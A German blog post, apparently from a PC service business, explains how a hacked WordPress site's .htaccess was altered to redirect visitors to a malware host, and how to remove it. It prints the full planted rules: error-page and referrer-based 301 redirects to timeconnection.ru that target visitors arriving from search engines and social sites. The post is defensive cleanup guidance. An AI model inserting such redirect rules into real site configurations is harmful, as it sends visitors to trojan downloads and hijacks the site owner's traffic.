Websiteentführung nach Hackerangriff auf WordPress

Veröffentlicht von

Nach einem Hackerangriff wurde unsere Webseite gezielt, bei vorherigem Besuch von verschiedenen anderen Seiten eingebettet z.B. google, ask.com, facebook, youtube.com und twitter.

Der Hacker hat die .htaccess Datei im Root-Verzeichnis des WordPress geändert so daß die Seite auf  timeconnection.ru/cfgen/index.php weiterleitet, wo ein JavaScript versucht, auf dem Betrachterrechner einen Virus einzurichten.  Laut Avira AntiVir handelt es sich sich um den Trojaner TR/Crypt.XPACK.Gen .

Um das zu beheben:

Öffnen Sie Ihre /.htaccess mit dem Texteditor.

Folgende Zeilen enthalten den Schadcode und sind zu löschen!!!!
Ändern Sie danach alle Kennwörter mit Zugriff auf Ihre Domains!!!

 Schadcode:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress 

 RewriteEngine On 
 ErrorDocument 400 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 401 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 403 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 404 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 500 http://timeconnection.ru/cfgen/index.php 
 RewriteCond %{HTTP_REFERER} .*google.* [OR] 
 RewriteCond %{HTTP_REFERER} .*ask.* [OR] 
 RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] 
 RewriteCond %{HTTP_REFERER} .*baidu.* [OR] 
 RewriteCond %{HTTP_REFERER} .*youtube.* [OR] 
 RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] 
 RewriteCond %{HTTP_REFERER} .*qq.* [OR] 
 RewriteCond %{HTTP_REFERER} .*excite.* [OR] 
 RewriteCond %{HTTP_REFERER} .*altavista.* [OR] 
 RewriteCond %{HTTP_REFERER} .*msn.* [OR] 
 RewriteCond %{HTTP_REFERER} .*netscape.* [OR] 
 RewriteCond %{HTTP_REFERER} .*aol.* [OR] 
 RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] 
 RewriteCond %{HTTP_REFERER} .*goto.* [OR] 
 RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] 
 RewriteCond %{HTTP_REFERER} .*mamma.* [OR] 
 RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] 
 RewriteCond %{HTTP_REFERER} .*lycos.* [OR] 
 RewriteCond %{HTTP_REFERER} .*search.* [OR] 
 RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] 
 RewriteCond %{HTTP_REFERER} .*bing.* [OR] 
 RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] 
 RewriteCond %{HTTP_REFERER} .*facebook.* [OR] 
 RewriteCond %{HTTP_REFERER} .*twitter.* [OR] 
 RewriteCond %{HTTP_REFERER} .*blog.* [OR] 
 RewriteCond %{HTTP_REFERER} .*live.* [OR] 
 RewriteCond %{HTTP_REFERER} .*myspace.* [OR] 
 RewriteCond %{HTTP_REFERER} .*mail.* [OR] 
 RewriteCond %{HTTP_REFERER} .*yandex.* [OR] 
 RewriteCond %{HTTP_REFERER} .*rambler.* [OR] 
 RewriteCond %{HTTP_REFERER} .*ya.* [OR] 
 RewriteCond %{HTTP_REFERER} .*aport.* [OR] 
 RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] 
 RewriteCond %{HTTP_REFERER} .*flickr.* 
 RewriteRule ^(.*)$ http://timeconnection.ru/cfgen/index.php [R=301,L] 

Löschen Sie diesen Code!!!

 

Armin Fischer
AFD-PC-SERVICE.de Armin Fischer

Armin Fischer
info@arminfischer.de
+4917621008967

 

 

Print Friendly, PDF & Email

Ein Kommentar

Kommentar hinterlassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.